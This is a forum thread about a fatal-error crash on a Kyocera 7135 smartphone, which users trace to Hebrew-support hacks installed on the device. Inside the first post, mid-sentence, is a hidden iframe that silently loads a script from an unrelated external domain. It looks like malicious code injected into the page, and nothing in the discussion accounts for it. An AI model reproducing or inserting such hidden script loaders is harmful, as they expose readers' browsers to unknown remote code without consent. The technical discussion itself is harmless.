    Found a bug in the 7135 - causes a fatal error !

    Hi all,

Just wanted to report a bug I found in the 7135, which causes a fatal error, and wanted to let you all know about it, and know if anyone found a cure:

If you press the "Phone" silk-screen button (the one that is used for "Calculator" in standard Palms), when in ANY s/w that displays a form with no title ==> the device crashes with a fatal error saying
    "fldhack.c, Line:9179, NULL string parameter".

At first I thought this was a bug in MY application - TAKEphONE, but then I could recreate it in other apps - the one you must have is the built-in Calculator.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    How?

Does this only occur via silkscreen button or no matter how you enter the phone app (recieve call, open flip, etc.)?
And which firmware(s) was this confirmed with?

    Great catch. Thanx!

Only via silkscreen, as far as I can tell.
How do I know the f/w version ?

One way is to go to the "phone info" app, and go to "versions" on the menu.

I have "Software" in that menu. It says:

    Phone software: MZ 1.0.38
    PDA software: SZ 1.0.24
    PRL: No info

Interesting... did you flash your 7135 to that version (or have it flashed)... or is that what you had out of the box?

oops... "software" is what I should have said

No PRL info is kinda strange. On the phone side (not using TAKEphONE!), dial 111111 and scroll down to "Options", and choose "Version". Does it show a PRL number there? (I'm just curious)

Does not work - I get a voice message from the operator saying "wrong number"

    Note - this is Israel ! Not Sprint/Verizon !

I have the phone on loan from the Israeli operator.

Ok, I gotcha, lol. When you do the 111111 you don't hit "talk", you just scroll down to "options" (which does not appear on the menu until dialing 111111).

What carrier are you on in Israel? That's the first 7135 I've read about here that (potentially) had MZ1.0.38 and SZ1.0.24 out of the box.

I have not been able to reproduce this error. I loaded the standard builtin calculator, then hit the silk screen button and it just popped into phone mode. I also tried turning titles off in Doodle and hitting the silkscreen and it worked fine. PTelnet also doesn't have a title and the switch works. Although, when switching back to PTelnet, it adds a blank title at the top.

    I'm using SZ1.0.23
    MZ1.0.36

It wouldn't be the first time Kyocera introduced a bug in a newer revision of their software. (I think I'm the only person who was affected by the infrared changes in the 3.5.2 to 3.5.3 upgrade on the 6035).

    Hi,

I guess it's something in my build, so...

Come to think of it - maybe it has something to do with the Hebrew support installed on my device - I think the way it is implemented is via hacks, and the message does say "fldhack"...

Just check it - disabled the Hebrew support, and the fatal error is gone !!!

Thanks all, and sorry for the false alarm...
